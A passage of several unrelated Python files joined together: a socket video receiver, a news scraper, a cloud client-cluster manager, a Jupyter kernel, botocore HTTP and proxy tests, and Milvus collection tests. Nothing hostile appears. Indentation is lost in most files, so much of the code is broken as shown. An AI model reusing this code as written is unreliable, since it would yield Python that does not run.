self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind((self.HOST, self._PORT))
print("self.host", self._PORT)
print('Socket bind complete Video_Getter')
self.connected = True
self.msg = "Connection is Completed Video_Getter"
self.s.listen(10)
print('Socket now listening Video_Getter')
self.conn, self.addr = self.s.accept()
self.connected = True
if self._ui.camera_var == 1:
self._ui.st_cameratype_lb_text = "Front is Open"
elif self._ui.camera_var == 2:
self._ui.st_cameratype_lb_text = "Bottom is Open"
break
except socket.error as msg:
print(msg, " in Video_Getter ")
self.msg = "Try to Connect"
time.sleep(1)
self.data = b""
self.payload_size = struct.calcsize(">L")
def start(self):
Thread(target=self.get, args=()).start()
return self
def get(self):
self.connect()
start = time.time()
while True:
if time.time() - start > 1:
start = time.time()
while len(self.data) < self.payload_size:
self.data += self.conn.recv(4096)
                if self.data == b'':
                    if self.connected:
                        # remember when the connection dropped
                        start = time.time()
                        self.connected = False
                    # reconnect after one second without receiving any data
                    if not self.connected and time.time() - start > 1:
                        self.connect()
packed_msg_size = self.data[:self.payload_size]
self.data = self.data[self.payload_size:]
msg_size = struct.unpack(">L", packed_msg_size)[0]
while len(self.data) < msg_size:
self.data += self.conn.recv(4096)
                if self.data == b'':
                    if self.connected:
                        start = time.time()
                        self.connected = False
                    # reconnect after one second without receiving any data
                    if not self.connected and time.time() - start > 1:
                        self.connect()
self.frame_data = self.data[:msg_size]
self.frame_data_send = self.frame_data
self.data = self.data[msg_size:]
if self._ui.camera_var == 0:
self.conn.close()
self.s.close()
self.connect()
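# Sender-side framing sketch (an assumption about the remote peer, not part of
# this module): each frame is a 4-byte big-endian length prefix, matching
# struct.calcsize(">L") above, followed by the payload bytes:
#
#     payload = encoded_frame
#     sock.sendall(struct.pack(">L", len(payload)) + payload)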
|
demo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import requests
import json
import time
from lxml import etree
import threading
headers = {
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
}
News_set = set()
def getData():
# url = "https://news.163.com/special/epidemic/"
url = "https://wp.m.163.com/163/page/news/virus_report/index.html"
html = requests.get(url, headers=headers)
soup = etree.HTML(html.text)
cover_data = soup.xpath(
'//div[@class="cover_data_china"]/div[starts-with(@class,"cover")]'
)
# current_time = soup.xpath('//div[@class="cover_li"]/span/text()')[0]
current_time = soup.xpath('//div[@class="cover_time"]/text()')[0]
    # XPath syntax: //div[@class="cover_data"]/div[starts-with(@class,"cover")]/div[@class="number"]
print(current_time)
# while True:
for cover in cover_data:
title = cover.xpath("h4/text()")[0]
number = cover.xpath('div[@class="number"]/text()')[0]
        result = current_time + " " + title + " " + number
# print(result)
if result not in News_set:
News_set.add(result)
print(title, number, end=" ")
# time.sleep(60*1)
def getNews():
url = "https://opendata.baidu.com/data/inner?tn=reserved_all_res_tn&dspName=iphone&from_sf=1&dsp=iphone&resource_id=28565&alr=1&query=%E8%82%BA%E7%82%8E&cb=jsonp_1580992074077_99412"
html = requests.get(url, headers=headers)
html_text = html.text
# print(html_text)
start = html_text.find('{"ResultCode":')
end = html_text.find(r'k_recall_srcids\u0000\u0000"}"}')
# print(str(start) + ":" + str(end))
#
json_data = json.loads(html_text[start:end])
# print(json_data['Result'][0]['DisplayData']['result']['items'])
data_news = json_data["Result"][0]["DisplayData"]["result"]["items"]
# while True:
for data in data_news:
news_title = data["eventDescription"]
news_time = data["eventTime"]
current_time = time.strftime(
"%Y-%m-%d %H:%M:%S", time.localtime(int(news_time))
)
url = data["eventUrl"]
site = data["siteName"]
print(url)
        result = news_title + " time: " + current_time + " site: " + site
print(result)
# time.sleep(60*1)
def main():
getData()
# getNews()
# threading.Thread(target=getData()).start()
# threading.Thread(target=getNews()).start()
if __name__ == "__main__":
main()
|
ClientsCluster.py
|
__author__ = 'cmantas'
from Node import Node
from VM import get_all_vms
from json import loads, dumps
from os import remove
from os.path import isfile
from lib.persistance_module import get_script_text, env_vars
from lib.tiramola_logging import get_logger
from threading import Thread
from lib.Cluster import *
class Clients(Cluster):
"""
Represents the Clients Cluster
"""
orchestrator = None # the VM to which the others report to
# the flavor and image for this cluster's VMs
flavor = env_vars["client_flavor"]
image = env_vars["cassandra_base_image"]
def __init__(self):
super(Clients, self).__init__()
self.cluster_name = "clients"
self.node_type = "client"
# the save file for saving/reloading the active cluster
self.save_file = home+"files/saved_%s_cluster.json" % self.cluster_name
# the logger for this file
self.log = get_logger('CLIENTS', 'INFO', logfile=home+'files/logs/Coordinator.log')
def find_orchestrator(self):
in_nodes = Node.get_all_nodes(check_active=True)
for n in in_nodes:
if "orchestrator" in n.name:
global orchestrator
orchestrator = n
return
def resume_cluster(self):
"""
Re-loads the cluster representation based on the VMs pre-existing on the IaaS and the 'save_file'
"""
self.log.info("Loading info from the IaaS")
if not isfile(self.save_file):
self.log.info("No existing created cluster")
saved_nodes = []
else:
saved_cluster = loads(open(self.save_file, 'r').read())
saved_nodes = saved_cluster['clients']
in_nodes = Node.get_all_nodes(check_active=True)
for n in in_nodes:
if n.name not in saved_nodes:
if "orchestrator" in n.name:
global orchestrator
orchestrator = n
self.log.debug('Found orchestrator %s' % n.name)
continue
else:
self.all_nodes.append(n)
#sort nodes by name
self.all_nodes.sort(key=lambda x: x.name)
def save_cluster(self):
"""
Creates/Saves the 'save_file'
:return:
"""
cluster = dict()
cluster["clients"] = [c.name for c in self.all_nodes]
string = dumps(cluster, indent=3)
f = open(self.save_file, 'w+')
f.write(string)
def create_cluster(self, count=1):
self.all_nodes = []
for i in range(count):
self.all_nodes.append(Node(self.cluster_name, node_type=self.node_type, number="%02d" % (i+1), create=True, IPv4=True,
flavor=self.flavor, image=self.image))
#save the cluster to file
self.save_cluster()
#wait until everybody is ready
self.wait_everybody()
self.find_orchestrator()
self.inject_hosts_files()
self.log.info('Every node is ready for SSH')
def inject_hosts_files(self):
"""
Creates a mapping of hostname -> IP for all the nodes in the cluster and injects it to all Nodes so that they
know each other by hostname. Also restarts the ganglia daemons
:return:
"""
self.log.info("Injecting host files")
hosts = dict()
for i in self.all_nodes:
hosts[i.name] = i.get_public_addr()
#add the host names to etc/hosts
orchestrator.inject_hostnames(hosts, delete=self.cluster_name)
for i in self.all_nodes:
i.inject_hostnames(hosts, delete=self.cluster_name)
self.all_nodes[0].run_command("service ganglia-monitor restart; service gmetad restart", silent=True)
orchestrator.run_command("service ganglia-monitor restart; service gmetad restart", silent=True)
def add_nodes(self, count=1):
"""
        Adds nodes to the clients cluster and refreshes the hosts file on all nodes
:return:
"""
self.log.info('Adding %d nodes' % count)
new_nodes = []
Node.flavor = env_vars['client_flavor']
for i in range(count):
#check if cluster did not previously exist
if i == 0 and len(self.all_nodes) == 0:
# give a floating IPv4 to the first node only
new_guy = Node(self.cluster_name, '', len(self.all_nodes)+1, create=True, IPv4=True)
else:
new_guy = Node(self.cluster_name, node_type="", number=len(self.all_nodes)+1, create=True)
self.all_nodes.append(new_guy)
new_nodes.append(new_guy)
self.save_cluster()
for n in new_nodes:
n.wait_ready()
#inject host files to everybody
n.inject_hostnames(self.get_hosts(private=True), delete=self.cluster_name)
n.bootstrap()
self.log.info("Node %s is live " % new_guy.name)
#inform all
self.inject_hosts_files()
def remove_nodes(self, count=1):
"""
        Removes nodes from the clients cluster and refreshes the hosts file on all nodes
:return:
"""
for i in range(count):
dead_guy = self.all_nodes.pop()
self.log.info("Removing node %s" % dead_guy.name)
dead_guy.decommission()
self.log.info("Client %s is removed" % dead_guy.name)
self.save_cluster()
self.inject_hosts_files()
def run(self, params):
self.bootstrap_cluster()
run_type = params['type']
servers = params['servers']
self.update_hostfiles(servers)
#choose type of run and do necessary actions
        if run_type == 'stress':
for c in self.all_nodes:
load_command = get_script_text(self.cluster_name, self.node_type, "run")
self.log.info("running stress workload on %s" % c.name)
c.run_command(load_command, silent=True)
elif run_type == 'sinusoid':
global env_vars
target = int(params['target']) / len(self.all_nodes)
offset = int(params['offset']) / len(self.all_nodes)
period = 60*int(params['period'])
threads = int(env_vars['client_threads'])
for c in self.all_nodes:
load_command = get_script_text(self.cluster_name, self.node_type, "run_sin") % (target, offset, period, threads)
#load_command += get_script_text(cluster_name, "", "run_sin") % (target, offset, period)
self.log.info("running sinusoid on %s" % c.name)
c.run_command(load_command, silent=True)
elif run_type == 'load':
record_count = int(params['records'])
start = 0
step = record_count/len(self.all_nodes)
threads = []
for c in self.all_nodes:
#load_command = get_script_text(self.cluster_name, self.node_type, "load") % (str(record_count), str(step), str(start))
load_command = get_script_text(self.cluster_name, self.node_type, "load").format(record_count, step, start)
#load_command += get_script_text(cluster_name, "", "load") % (str(record_count), str(step), str(start))
self.log.info("running load phase on %s for %d of %d records" % (c.name, step, record_count))
t = Thread(target=c.run_command, args=(load_command,) )
threads.append(t)
t.start()
start += step
self.log.info("waiting for load phase to finish in clients")
for t in threads:
t.join()
self.log.info("load finished")
def destroy_all(self):
"""
Destroys all the VMs in the cluster (not the orchestrator)
"""
self.log.info("Destroying the %s cluster" % self.cluster_name)
for n in self.all_nodes:
n.destroy()
remove(self.save_file)
my_Clients = Clients()
# always runs
my_Clients.resume_cluster()
|
kernel.py
|
from queue import Queue
from threading import Thread
from ipykernel.kernelbase import Kernel
import re
import subprocess
import tempfile
import os
import os.path as path
class RealTimeSubprocess(subprocess.Popen):
"""
    A subprocess whose stdout and stderr can be read in real time
"""
def __init__(self, cmd, write_to_stdout, write_to_stderr):
"""
:param cmd: the command to execute
:param write_to_stdout: a callable that will be called with chunks of data from stdout
:param write_to_stderr: a callable that will be called with chunks of data from stderr
"""
self._write_to_stdout = write_to_stdout
self._write_to_stderr = write_to_stderr
super().__init__(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)
self._stdout_queue = Queue()
self._stdout_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stdout, self._stdout_queue))
self._stdout_thread.daemon = True
self._stdout_thread.start()
self._stderr_queue = Queue()
self._stderr_thread = Thread(target=RealTimeSubprocess._enqueue_output, args=(self.stderr, self._stderr_queue))
self._stderr_thread.daemon = True
self._stderr_thread.start()
@staticmethod
def _enqueue_output(stream, queue):
"""
Add chunks of data from a stream to a queue until the stream is empty.
"""
for line in iter(lambda: stream.read(4096), b''):
queue.put(line)
stream.close()
def write_contents(self):
"""
        Write any available content from stdout and stderr to the callables supplied when the instance was created
:return:
"""
def read_all_from_queue(queue):
res = b''
size = queue.qsize()
while size != 0:
res += queue.get_nowait()
size -= 1
return res
stdout_contents = read_all_from_queue(self._stdout_queue)
if stdout_contents:
self._write_to_stdout(stdout_contents)
stderr_contents = read_all_from_queue(self._stderr_queue)
if stderr_contents:
self._write_to_stderr(stderr_contents)
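# Usage sketch (illustrative): poll the process and flush its output as it arrives.
#
#     proc = RealTimeSubprocess(['echo', 'hi'],
#                               lambda data: print(data.decode(), end=''),
#                               lambda data: print(data.decode(), end=''))
#     while proc.poll() is None:
#         proc.write_contents()
#     proc.write_contents()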
class QuonKernel(Kernel):
implementation = 'jupyter_quon_kernel'
implementation_version = '1.0'
language = 'quon'
language_version = 'quonSexpr'
language_info = {'name': 'quon',
'mimetype': 'text/plain',
'file_extension': '.qon'}
banner = "Quon kernel.\n" \
"Uses quon, compiles, and creates source code files and executables in temporary folder.\n"
def __init__(self, *args, **kwargs):
super(QuonKernel, self).__init__(*args, **kwargs)
self.files = []
mastertemp = tempfile.mkstemp(suffix='.out')
os.close(mastertemp[0])
self.master_path = mastertemp[1]
filepath = path.join(path.dirname(path.realpath(__file__)), 'resources', 'master.c')
subprocess.call(['jupyter.sh', filepath, self.master_path])
def cleanup_files(self):
"""Remove all the temporary files created by the kernel"""
for file in self.files:
os.remove(file)
os.remove(self.master_path)
def new_temp_file(self, **kwargs):
"""Create a new temp file to be deleted when the kernel shuts down"""
# We don't want the file to be deleted when closed, but only when the kernel stops
kwargs['delete'] = False
kwargs['mode'] = 'w'
file = tempfile.NamedTemporaryFile(**kwargs)
self.files.append(file.name)
return file
def _write_to_stdout(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stdout', 'text': contents})
def _write_to_stderr(self, contents):
self.send_response(self.iopub_socket, 'stream', {'name': 'stderr', 'text': contents})
def create_jupyter_subprocess(self, cmd):
return RealTimeSubprocess(cmd,
lambda contents: self._write_to_stdout(contents.decode()),
lambda contents: self._write_to_stderr(contents.decode()))
    def compile_with_gcc(self, source_filename, binary_filename, cflags=None, ldflags=None):
        # Compilation is delegated to jupyter.sh; the cflags/ldflags arguments are currently unused.
        args = ['jupyter.sh', source_filename, binary_filename]
        return self.create_jupyter_subprocess(args)
def _filter_magics(self, code):
magics = {'cflags': [],
'ldflags': [],
'args': []}
for line in code.splitlines():
if line.startswith('//%'):
                key, value = line[3:].split(":", 1)
key = key.strip().lower()
if key in ['ldflags', 'cflags']:
for flag in value.split():
magics[key] += [flag]
elif key == "args":
# Split arguments respecting quotes
for argument in re.findall(r'(?:[^\s,"]|"(?:\\.|[^"])*")+', value):
magics['args'] += [argument.strip('"')]
return magics
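    # Example of the magic-comment syntax parsed above (values are illustrative):
    #
    #     //%cflags: -O2 -Wall
    #     //%ldflags: -lm
    #     //%args: "hello world" 42
    #
    # cflags/ldflags are collected here but currently unused by compile_with_gcc.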
def do_execute(self, code, silent, store_history=True,
user_expressions=None, allow_stdin=False):
magics = self._filter_magics(code)
with self.new_temp_file(suffix='.c') as source_file:
source_file.write(code)
source_file.flush()
with self.new_temp_file(suffix='.out') as binary_file:
p = self.compile_with_gcc(source_file.name, binary_file.name, magics['cflags'], magics['ldflags'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0: # Compilation failed
self._write_to_stderr(
"[qon kernel] Qon exited with code {}, the executable will not be executed".format(
p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [],
'user_expressions': {}}
p = self.create_jupyter_subprocess([self.master_path, binary_file.name] + magics['args'])
while p.poll() is None:
p.write_contents()
p.write_contents()
if p.returncode != 0:
self._write_to_stderr("[qon kernel] Executable exited with code {}".format(p.returncode))
return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}}
def do_shutdown(self, restart):
"""Cleanup the created source code files and executables when shutting down the kernel"""
self.cleanup_files()
|
test_client_http.py
|
import select
import socket
import contextlib
import threading
import mock
from tests import unittest
from contextlib import contextmanager
import botocore.session
from botocore.config import Config
from botocore.vendored.six.moves import BaseHTTPServer, socketserver
from botocore.exceptions import (
ConnectTimeoutError, ReadTimeoutError, EndpointConnectionError,
ConnectionClosedError, ClientError, ProxyConnectionError
)
from botocore.vendored.requests import exceptions as requests_exceptions
class TestClientHTTPBehavior(unittest.TestCase):
def setUp(self):
self.port = unused_port()
self.localhost = 'http://localhost:%s/' % self.port
self.session = botocore.session.get_session()
        # Set fake credentials so the credential chain isn't searched, which
        # could trigger additional API calls (assume role, etc).
self.session.set_credentials('fakeakid', 'fakesecret')
@unittest.skip('Test has suddenly become extremely flakey.')
def test_can_proxy_https_request_with_auth(self):
proxy_url = 'http://user:pass@localhost:%s/' % self.port
config = Config(proxies={'https': proxy_url}, region_name='us-west-1')
client = self.session.create_client('ec2', config=config)
class AuthProxyHandler(ProxyHandler):
event = threading.Event()
def validate_auth(self):
proxy_auth = self.headers.get('Proxy-Authorization')
return proxy_auth == 'Basic dXNlcjpwYXNz'
try:
with background(run_server, args=(AuthProxyHandler, self.port)):
AuthProxyHandler.event.wait(timeout=60)
client.describe_regions()
except BackgroundTaskFailed:
self.fail('Background task did not exit, proxy was not used.')
@unittest.skip('Proxy cannot connect to service when run in CodeBuild.')
def test_proxy_request_includes_host_header(self):
proxy_url = 'http://user:pass@localhost:%s/' % self.port
config = Config(
proxies={'https': proxy_url},
proxies_config={'proxy_use_forwarding_for_https': True},
region_name='us-west-1'
)
environ = {'BOTO_EXPERIMENTAL__ADD_PROXY_HOST_HEADER': "True"}
self.environ_patch = mock.patch('os.environ', environ)
self.environ_patch.start()
client = self.session.create_client('ec2', config=config)
class ConnectProxyHandler(ProxyHandler):
event = threading.Event()
def do_CONNECT(self):
remote_host, remote_port = self.path.split(':')
# Ensure we're sending the correct host header in CONNECT
if self.headers.get('host') != remote_host:
self.send_response(400)
self.end_headers()
return
self.send_response(200)
self.end_headers()
remote_host, remote_port = self.path.split(':')
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host, int(remote_port)))
self._tunnel(self.request, remote_socket)
remote_socket.close()
try:
with background(run_server, args=(ConnectProxyHandler, self.port)):
ConnectProxyHandler.event.wait(timeout=60)
client.describe_regions()
except BackgroundTaskFailed:
self.fail('Background task did not exit, proxy was not used.')
except ProxyConnectionError:
self.fail('Proxy CONNECT failed, unable to establish connection.')
except ClientError as e:
# Fake credentials won't resolve against service
# but we've successfully contacted through the proxy
assert e.response['Error']['Code'] == 'AuthFailure'
finally:
self.environ_patch.stop()
def _read_timeout_server(self):
config = Config(
read_timeout=0.1,
retries={'max_attempts': 0},
region_name='us-weast-2',
)
client = self.session.create_client('ec2', endpoint_url=self.localhost,
config=config)
client_call_ended_event = threading.Event()
class FakeEC2(SimpleHandler):
event = threading.Event()
msg = b'<response/>'
def get_length(self):
return len(self.msg)
def get_body(self):
client_call_ended_event.wait(timeout=60)
return self.msg
try:
with background(run_server, args=(FakeEC2, self.port)):
try:
FakeEC2.event.wait(timeout=60)
client.describe_regions()
finally:
client_call_ended_event.set()
except BackgroundTaskFailed:
self.fail('Fake EC2 service was not called.')
def test_read_timeout_exception(self):
with self.assertRaises(ReadTimeoutError):
self._read_timeout_server()
def test_old_read_timeout_exception(self):
with self.assertRaises(requests_exceptions.ReadTimeout):
self._read_timeout_server()
@unittest.skip('The current implementation will fail to timeout on linux')
def test_connect_timeout_exception(self):
config = Config(
connect_timeout=0.2,
retries={'max_attempts': 0},
region_name='us-weast-2',
)
client = self.session.create_client('ec2', endpoint_url=self.localhost,
config=config)
server_bound_event = threading.Event()
client_call_ended_event = threading.Event()
def no_accept_server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', self.port))
server_bound_event.set()
client_call_ended_event.wait(timeout=60)
sock.close()
with background(no_accept_server):
server_bound_event.wait(timeout=60)
with self.assertRaises(ConnectTimeoutError):
client.describe_regions()
client_call_ended_event.set()
def test_invalid_host_gaierror(self):
config = Config(retries={'max_attempts': 0}, region_name='us-weast-1')
endpoint = 'https://ec2.us-weast-1.amazonaws.com/'
client = self.session.create_client('ec2', endpoint_url=endpoint,
config=config)
with self.assertRaises(EndpointConnectionError):
client.describe_regions()
def test_bad_status_line(self):
config = Config(retries={'max_attempts': 0}, region_name='us-weast-2')
client = self.session.create_client('ec2', endpoint_url=self.localhost,
config=config)
class BadStatusHandler(BaseHTTPServer.BaseHTTPRequestHandler):
event = threading.Event()
def do_POST(self):
self.wfile.write(b'garbage')
with background(run_server, args=(BadStatusHandler, self.port)):
with self.assertRaises(ConnectionClosedError):
BadStatusHandler.event.wait(timeout=60)
client.describe_regions()
def unused_port():
with contextlib.closing(socket.socket()) as sock:
sock.bind(('127.0.0.1', 0))
return sock.getsockname()[1]
class SimpleHandler(BaseHTTPServer.BaseHTTPRequestHandler):
status = 200
def get_length(self):
return 0
def get_body(self):
return b''
def do_GET(self):
length = str(self.get_length())
self.send_response(self.status)
self.send_header('Content-Length', length)
self.end_headers()
self.wfile.write(self.get_body())
do_POST = do_PUT = do_GET
class ProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
tunnel_chunk_size = 1024
poll_limit = 10**4
def _tunnel(self, client, remote):
client.setblocking(0)
remote.setblocking(0)
sockets = [client, remote]
noop_count = 0
while True:
readable, writeable, _ = select.select(sockets, sockets, [], 1)
if client in readable and remote in writeable:
noop_count = 0
client_bytes = client.recv(self.tunnel_chunk_size)
if not client_bytes:
break
remote.sendall(client_bytes)
if remote in readable and client in writeable:
noop_count = 0
remote_bytes = remote.recv(self.tunnel_chunk_size)
if not remote_bytes:
break
client.sendall(remote_bytes)
if noop_count > self.poll_limit:
# We have a case where all communication has
# finished but we never saw an empty read.
# This will leave both sockets as writeable
# indefinitely. We'll force a break here if
# we've crossed our polling limit.
break
noop_count += 1
def do_CONNECT(self):
if not self.validate_auth():
self.send_response(401)
self.end_headers()
return
self.send_response(200)
self.end_headers()
remote_host, remote_port = self.path.split(':')
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host, int(remote_port)))
self._tunnel(self.request, remote_socket)
remote_socket.close()
def validate_auth(self):
return True
class BackgroundTaskFailed(Exception):
pass
@contextmanager
def background(target, args=(), timeout=60):
thread = threading.Thread(target=target, args=args)
thread.daemon = True
thread.start()
try:
yield target
finally:
thread.join(timeout=timeout)
if thread.is_alive():
msg = 'Background task did not exit in a timely manner.'
raise BackgroundTaskFailed(msg)
def run_server(handler, port):
address = ('', port)
httpd = socketserver.TCPServer(address, handler, bind_and_activate=False)
httpd.allow_reuse_address = True
httpd.server_bind()
httpd.server_activate()
handler.event.set()
httpd.handle_request()
httpd.server_close()
|
test_collection.py
|
import numpy
import pandas as pd
import pytest
from pymilvus import DataType
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common import constants as cons
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
exp_shards_num = "shards_num"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_shards_num = 2
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"data": gen_vectors(1, default_dim),
"anns_field": default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
"limit": default_top_k,
}
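# default_single_query follows the pymilvus search signature: `data` holds the query
# vectors, `anns_field` names the vector field to search, `param` carries the metric
# type plus index-specific search params (nprobe for IVF indexes), and `limit` is the top-k.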
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_empty_name(self):
"""
target: test collection with empty name
method: create collection with an empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: 1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
method: create collection with dup name and none schema and data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
expected: two collection object is available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
